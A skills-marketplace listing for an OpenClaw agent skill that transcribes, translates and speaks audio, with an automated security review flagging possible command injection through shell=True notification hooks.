← Back to Skills Marketplace

speech-translation

Name: speech-translation
Author: decin

by decin · GitHub ↗ · v1.0.0 · MIT-0

cross-platform ⚠ suspicious

197

Downloads

Stars

Active Installs

Versions

Install in OpenClaw

/install speech-translation

Description

Build, adapt, or run an audio-processing workflow that takes spoken audio, transcribes it with Whisper or faster-whisper, translates the transcript using the...

Usage Guidance

This skill appears to do exactly what it says: local transcription, translation orchestration, and TTS. Before installing or running it: 1) Only configure notification command templates (or environment variables that set them) from trusted sources — the notifier code executes those commands with shell=True and may run arbitrary processes. 2) Prefer the provided mock senders for testing to avoid accidental data leaks. 3) Run the pipeline in a sandbox or isolated environment if you plan to use service backends or custom command hooks. 4) Validate any translation_service_url you provide and avoid pointing it to untrusted endpoints. 5) Keep the external piper binary and Python dependencies installed from trusted channels. If you want, I can point to the exact lines where subprocess.run with shell=True and unescaped formatting is used so you can review or harden them.

Capability Analysis

Type: OpenClaw Skill Name: speech-translation Version: 1.0.0 The skill bundle contains multiple instances of potential command injection vulnerabilities where external commands are executed via `subprocess.run(..., shell=True)` using templates provided by environment variables or CLI arguments (specifically in `scripts/send_audio.py`, `scripts/send_text.py`, and `scripts/voice_translate_app/notifier.py`). While these are designed as notification hooks for the translation pipeline, the lack of strict validation on the command templates poses a significant RCE risk. However, the code logic and agent instructions in `SKILL.md` appear consistent with the stated purpose of audio processing and translation, with no clear evidence of intentional malice or data exfiltration.

Capability Assessment

✓ Purpose & Capability

The name/description match the included Python pipeline: transcription (faster-whisper or mock), translation (agent-LLM, manual, or HTTP service), and TTS (piper or mock). There are no unrelated required credentials, binaries, or config paths; the code and docs consistently implement the described workflows.

ℹ Instruction Scope

SKILL.md stays on-purpose (chat-native vs local pipeline, LLM-assisted default). It explicitly supports notification hooks that run external commands to report stages; those hooks (and send_text/send_audio helpers) cause the runtime to execute arbitrary shell commands when configured. This is expected for a pipeline but expands the skill's runtime actions beyond pure file IO/network calls — treat notification command templates as sensitive configuration.

✓ Install Mechanism

No install spec (instruction-only + bundled scripts). That lowers risk because nothing is downloaded or installed by the registry; the repo only contains local Python scripts and shell wrappers. The runtime does require optional third-party packages (faster-whisper, requests) and an external 'piper' binary for full functionality, per the README.

ℹ Credentials

The skill declares no required env vars or credentials, which matches the code. However several scripts read optional environment variables (VOICE_TRANSLATE_TEXT_COMMAND_TEMPLATE, VOICE_TRANSLATE_AUDIO_COMMAND_TEMPLATE) as command templates. These are not required but, if set, control what external commands are run and could be used to exfiltrate data if misconfigured or supplied by an attacker.

✓ Persistence & Privilege

The skill does not request persistent/always-on inclusion, does not modify other skills or system settings, and does not demand elevated privileges. It runs as a normal on-demand pipeline invoked by the agent/user.

How to Use

Make sure OpenClaw is installed (local or Docker)
Run the install command in chat: /install speech-translation
After installation, invoke the skill by name or use /speech-translation
Provide required inputs per the skill's parameter spec and get structured output

Version History

v1.0.0

- Initial release of the voice translation skill. - Supports audio transcription with Whisper or faster-whisper, translation by the current agent model, and speech synthesis using Piper, OpenClaw tts, or a mock backend. - Offers two modes: chat-native voice translation and a deterministic local file-based pipeline. - Ensures consistent output order: transcript, translation, then translated audio. - Includes resources, references, and scripts for setup, orchestration, and backend selection. - Designed for both interactive chat and automated batch workflows.

Metadata

Slug speech-translation

Version 1.0.0

License MIT-0

All-time Installs 1

Active Installs 1

Total Versions 1

Frequently Asked Questions

What is speech-translation?

Build, adapt, or run an audio-processing workflow that takes spoken audio, transcribes it with Whisper or faster-whisper, translates the transcript using the... It is an AI Agent Skill for Claude Code / OpenClaw, with 197 downloads so far.

How do I install speech-translation?

Run "/install speech-translation" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is speech-translation free?

Yes, speech-translation is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does speech-translation support?

speech-translation is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created speech-translation?

It is built and maintained by decin (@decin); the current version is v1.0.0.

More Skills